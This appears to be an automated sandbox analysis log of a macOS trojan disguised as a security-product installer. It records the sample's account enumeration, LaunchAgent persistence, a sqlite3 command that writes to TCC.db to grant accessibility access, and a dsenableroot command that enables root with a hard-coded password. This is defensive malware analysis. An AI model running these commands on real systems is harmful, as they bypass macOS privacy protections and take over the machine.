Source: /bin/sh (PID: 632)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_tokend uidJump to behavior
Source: /bin/sh (PID: 633)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_trustevaluationagent uidJump to behavior
Source: /bin/sh (PID: 634)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_unknown uidJump to behavior
Source: /bin/sh (PID: 635)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_update_sharing uidJump to behavior
Source: /bin/sh (PID: 636)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_usbmuxd uidJump to behavior
Source: /bin/sh (PID: 637)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_uucp uidJump to behavior
Source: /bin/sh (PID: 638)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_warmd uidJump to behavior
Source: /bin/sh (PID: 639)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_webauthserver uidJump to behavior
Source: /bin/sh (PID: 640)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_windowserver uidJump to behavior
Source: /bin/sh (PID: 641)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_www uidJump to behavior
Source: /bin/sh (PID: 642)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_wwwproxy uidJump to behavior
Source: /bin/sh (PID: 643)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xcsbuildagent uidJump to behavior
Source: /bin/sh (PID: 644)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xcscredserver uidJump to behavior
Source: /bin/sh (PID: 645)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xserverdocs uidJump to behavior
Source: /bin/sh (PID: 646)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/henry uidJump to behavior
Source: /bin/sh (PID: 666)Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/henry naprivsJump to behavior
Executes the "kill" command typically used to terminate processesShow sources
Source: /usr/bin/perl5.18 (PID: 654)Kill executable: /bin/kill -> /bin/kill -9 320Jump to behavior
Executes the "mkdir" command used to create foldersShow sources
Source: /bin/bash (PID: 533)Mkdir executable: /bin/mkdir -> mkdir /Users/henry/.calisto/Jump to behavior
Executes the "ps" command used to list the status of processesShow sources
Source: /usr/bin/perl5.18 (PID: 647)Ps executable: /bin/ps -> /bin/ps auxwwwJump to behavior
Source: /usr/bin/perl5.18 (PID: 650)Ps executable: /bin/ps -> /bin/ps -acxJump to behavior
Source: /usr/bin/perl5.18 (PID: 651)Ps executable: /bin/ps -> /bin/ps -acxJump to behavior
Source: /usr/bin/perl5.18 (PID: 652)Ps executable: /bin/ps -> /bin/ps -acxJump to behavior
Source: /usr/bin/perl5.18 (PID: 653)Ps executable: /bin/ps -> /bin/ps -acxJump to behavior
Source: /usr/bin/perl5.18 (PID: 655)Ps executable: /bin/ps -> /bin/ps -acxJump to behavior
Source: /usr/bin/perl5.18 (PID: 657)Ps executable: /bin/ps -> /bin/ps -acxJump to behavior
Source: /usr/bin/perl5.18 (PID: 658)Ps executable: /bin/ps -> /bin/ps -acxJump to behavior
Source: /usr/bin/perl5.18 (PID: 659)Ps executable: /bin/ps -> /bin/ps -acxJump to behavior
Source: /usr/bin/perl5.18 (PID: 660)Ps executable: /bin/ps -> /bin/ps -acxJump to behavior
Source: /usr/bin/perl5.18 (PID: 661)Ps executable: /bin/ps -> /bin/ps -acxJump to behavior
Source: /usr/bin/perl5.18 (PID: 662)Ps executable: /bin/ps -> /bin/ps -acxJump to behavior
Source: /usr/bin/perl5.18 (PID: 663)Ps executable: /bin/ps -> /bin/ps -acxJump to behavior
Source: /usr/bin/perl5.18 (PID: 664)Ps executable: /bin/ps -> /bin/ps auxwwwJump to behavior
Explicitly lists launch services possibly for searchingShow sources
Source: /bin/sh (PID: 649)Launch agent/daemon listed: /bin/launchctl list com.apple.screensharingJump to behavior
Reads launchservices plist filesShow sources
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Reads user launchservices plist file containing default apps for corresponding file typesShow sources
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Writes 64-bit Mach-O files to diskShow sources
Source: /bin/cp (PID: 674)File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/A/AlamofireJump to dropped file
Source: /bin/cp (PID: 674)File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/A/CryptoSwiftJump to dropped file
Source: /bin/cp (PID: 674)File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftAppKit.dylibJump to dropped file
Source: /bin/cp (PID: 674)File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCore.dylibJump to dropped file
Source: /bin/cp (PID: 674)File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreData.dylibJump to dropped file
Source: /bin/cp (PID: 674)File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreGraphics.dylibJump to dropped file
Source: /bin/cp (PID: 674)File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreImage.dylibJump to dropped file
Source: /bin/cp (PID: 674)File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDarwin.dylibJump to dropped file
Source: /bin/cp (PID: 674)File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDispatch.dylibJump to dropped file
Source: /bin/cp (PID: 674)File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftFoundation.dylibJump to dropped file
Source: /bin/cp (PID: 674)File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftObjectiveC.dylibJump to dropped file
Source: /bin/cp (PID: 674)File written: /System/Library/CoreServices/launchb.app/Contents/MacOS/Mac Internet Security X9 InstallerJump to dropped file
Writes ZIP files to diskShow sources
Source: /usr/bin/zip (PID: 537)ZIP file created: /Users/henry/.calisto/zi6c7T1oJump to dropped file
Source: /usr/bin/zip (PID: 539)ZIP file created: /Users/henry/.calisto/zi415FngJump to dropped file
Writes icon files to diskShow sources
Source: /bin/cp (PID: 674)File written: /System/Library/CoreServices/launchb.app/Contents/Resources/AppIcon.icnsJump to dropped file
Creates application bundles containing framework (and dylib) filesShow sources
Source: /bin/cp (PID: 674)Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/A/AlamofireJump to behavior
Source: /bin/cp (PID: 674)Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/A/Resources/Info.plistJump to behavior
Source: /bin/cp (PID: 674)Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/A/CryptoSwiftJump to behavior
Source: /bin/cp (PID: 674)Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/A/Resources/Info.plistJump to behavior
Source: /bin/cp (PID: 674)Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftAppKit.dylibJump to behavior
Source: /bin/cp (PID: 674)Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCore.dylibJump to behavior
Source: /bin/cp (PID: 674)Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreData.dylibJump to behavior
Source: /bin/cp (PID: 674)Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreGraphics.dylibJump to behavior
Source: /bin/cp (PID: 674)Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreImage.dylibJump to behavior
Source: /bin/cp (PID: 674)Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDarwin.dylibJump to behavior
Source: /bin/cp (PID: 674)Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDispatch.dylibJump to behavior
Source: /bin/cp (PID: 674)Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftFoundation.dylibJump to behavior
Source: /bin/cp (PID: 674)Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftObjectiveC.dylibJump to behavior
Source: /bin/cp (PID: 674)Framework directory symbolic link created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Alamofire -> Versions/Current/AlamofireJump to behavior
Source: /bin/cp (PID: 674)Framework directory symbolic link created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Resources -> Versions/Current/ResourcesJump to behavior
Source: /bin/cp (PID: 674)Framework directory symbolic link created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/Current -> AJump to behavior
Source: /bin/cp (PID: 674)Framework directory symbolic link created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/CryptoSwift -> Versions/Current/CryptoSwiftJump to behavior
Source: /bin/cp (PID: 674)Framework directory symbolic link created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Resources -> Versions/Current/ResourcesJump to behavior
Source: /bin/cp (PID: 674)Framework directory symbolic link created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/Current -> AJump to behavior
Creates application bundles containing icon filesShow sources
Source: /bin/cp (PID: 674)Icon file created: /System/Library/CoreServices/launchb.app/Contents/Resources/AppIcon.icnsJump to behavior
Reads data from the local random generatorShow sources
Source: /usr/bin/sqlite3 (PID: 541)Random device file read: /dev/urandomJump to behavior
Source: /usr/bin/perl5.18 (PID: 546)Random device file read: /dev/urandomJump to behavior
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Writes property list (.plist) files to diskShow sources
Source: /bin/cp (PID: 674)XML plist file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/A/Resources/Info.plistJump to dropped file
Source: /bin/cp (PID: 674)XML plist file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/A/Resources/Info.plistJump to dropped file
Source: /bin/cp (PID: 674)XML plist file created: /System/Library/CoreServices/launchb.app/Contents/Info.plist
Source: /bin/cp (PID: 674)Binary plist file created: /System/Library/CoreServices/launchb.app/Contents/Resources/Base.lproj/Main.storyboardc/Info.plistJump to dropped file
Source: /bin/cp (PID: 674)Binary plist file created: /System/Library/CoreServices/launchb.app/Contents/Resources/Base.lproj/Main.storyboardc/MainMenu.nibJump to dropped file
Source: /bin/cp (PID: 674)Binary plist file created: /System/Library/CoreServices/launchb.app/Contents/Resources/Base.lproj/Main.storyboardc/NSWindowController-B8D-0N-5wS.nibJump to dropped file
Source: /bin/cp (PID: 674)Binary plist file created: /System/Library/CoreServices/launchb.app/Contents/Resources/Base.lproj/Main.storyboardc/XfG-lQ-9wD-view-m2S-Jp-Qdl.nibJump to dropped file
Source: /bin/cp (PID: 674)XML plist file created: /System/Library/CoreServices/launchb.app/Contents/Resources/com.intego.Mac-Internet-Security-X9-Installer.plistJump to dropped file
Source: /bin/cp (PID: 674)XML plist file created: /System/Library/CoreServices/launchb.app/Contents/Resources/InfoL.plistJump to dropped file
Source: /bin/cp (PID: 678)XML plist file created: /System/Library/CoreServices/launchb.app/Contents/Info.plistJump to dropped file
Source: /bin/cp (PID: 680)XML plist file created: /Library/LaunchAgents/com.intego.Mac-Internet-Security-X9-Installer.plistJump to dropped file

Boot Survival:

barindex
Creates memory-persistent launch servicesShow sources
Source: /bin/cp (PID: 680)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Library/LaunchAgents/com.intego.Mac-Internet-Security-X9-Installer.plistJump to behavior
Creates user-wide 'launchd' managed services aka launch agentsShow sources
Source: /bin/cp (PID: 680)Launch agent created file created: /Library/LaunchAgents/com.intego.Mac-Internet-Security-X9-Installer.plistJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies SQLite TCC DB accessibility settings (may be set to prevent user dialogs)Show sources
Source: /usr/bin/sudo (PID: 541)TCC.db kTCCServiceAccessibility modification: /usr/bin/sqlite3 -> /usr/bin/sqlite3 /Library/Application Support/com.apple.TCC/TCC.db INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL)Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Executes the "dsenableroot" command used to enable/disable the root accountShow sources
Source: /bin/bash (PID: 670)Dsenableroot executable: /usr/sbin/dsenableroot -> dsenableroot -p -r aGNOStIC7890!!!Jump to behavior
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)Show sources
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529)Sysctl read request: kern.safeboot (1.66)Jump to behavior

Language, Device and Operating System Detection:

barindex
Reads process information of other processesShow sources
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.546 -> queries PID 546Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.545 -> queries PID 545Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.544 -> queries PID 544Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.534 -> queries PID 534Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.530 -> queries PID 530Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.529 -> queries PID 529Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.521 -> queries PID 521Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.519 -> queries PID 519Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.512 -> queries PID 512Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.508 -> queries PID 508Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.478 -> queries PID 478Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.477 -> queries PID 477Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.427 -> queries PID 427Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.426 -> queries PID 426Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.425 -> queries PID 425Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.424 -> queries PID 424Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.423 -> queries PID 423Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.422 -> queries PID 422Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.421 -> queries PID 421Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.420 -> queries PID 420Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.419 -> queries PID 419Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.418 -> queries PID 418Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.417 -> queries PID 417Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.416 -> queries PID 416Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.415 -> queries PID 415Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.414 -> queries PID 414Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.413 -> queries PID 413Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.412 -> queries PID 412Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.411 -> queries PID 411Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.408 -> queries PID 408Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.407 -> queries PID 407Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.406 -> queries PID 406Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.405 -> queries PID 405Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.404 -> queries PID 404Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.403 -> queries PID 403Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.402 -> queries PID 402Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.400 -> queries PID 400Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.399 -> queries PID 399Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.397 -> queries PID 397Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.394 -> queries PID 394Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.393 -> queries PID 393Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.392 -> queries PID 392Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.391 -> queries PID 391Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.390 -> queries PID 390Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.389 -> queries PID 389Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.387 -> queries PID 387Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.386 -> queries PID 386Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.380 -> queries PID 380Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.379 -> queries PID 379Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.378 -> queries PID 378Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.377 -> queries PID 377Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.375 -> queries PID 375Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.374 -> queries PID 374Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.373 -> queries PID 373Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.372 -> queries PID 372Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.370 -> queries PID 370Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.369 -> queries PID 369Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.368 -> queries PID 368Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.367 -> queries PID 367Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.366 -> queries PID 366Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.365 -> queries PID 365Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.364 -> queries PID 364Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.363 -> queries PID 363Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.361 -> queries PID 361Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.360 -> queries PID 360Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.359 -> queries PID 359Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.354 -> queries PID 354Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.353 -> queries PID 353Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.352 -> queries PID 352Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.351 -> queries PID 351Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.350 -> queries PID 350Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.349 -> queries PID 349Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.348 -> queries PID 348Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.347 -> queries PID 347Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.343 -> queries PID 343Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.342 -> queries PID 342Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.341 -> queries PID 341Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.340 -> queries PID 340Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.339 -> queries PID 339Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.337 -> queries PID 337Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.336 -> queries PID 336Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.335 -> queries PID 335Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.334 -> queries PID 334Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.332 -> queries PID 332Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.331 -> queries PID 331Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.330 -> queries PID 330Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.329 -> queries PID 329Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.326 -> queries PID 326Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.325 -> queries PID 325Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.324 -> queries PID 324Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.323 -> queries PID 323Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.320 -> queries PID 320Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.315 -> queries PID 315Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.314 -> queries PID 314Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.312 -> queries PID 312Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.311 -> queries PID 311Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.309 -> queries PID 309Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.308 -> queries PID 308Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.307 -> queries PID 307Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.306 -> queries PID 306Jump to behavior
Source: /bin/ps (PID: 647)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.305 -> queries PID 305Jump to behavior
Queries OS software version with shell command 'sw_vers'Show sources
Source: /usr/bin/perl5.18 (PID: 547)sw_vers executed: /usr/bin/sw_vers -productVersionJump to behavior
Reads hardware related sysctl valuesShow sources
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529)Sysctl read request: hw.availcpu (6.25)Jump to behavior
Source: /bin/ps (PID: 647)Sysctl read request: hw.memsize (6.24)Jump to behavior
Source: /bin/ps (PID: 664)Sysctl read request: hw.memsize (6.24)Jump to behavior
Reads the systems hostnameShow sources
Source: /bin/bash (PID: 533)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/bash (PID: 534)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 536)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 540)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 542)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 545)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 548)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 549)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 550)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 551)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 552)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 553)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 554)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 555)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 556)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 557)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 558)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 559)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 560)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 561)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 562)Sysctl requested: kern.hostname (1.10)Jump to behavior
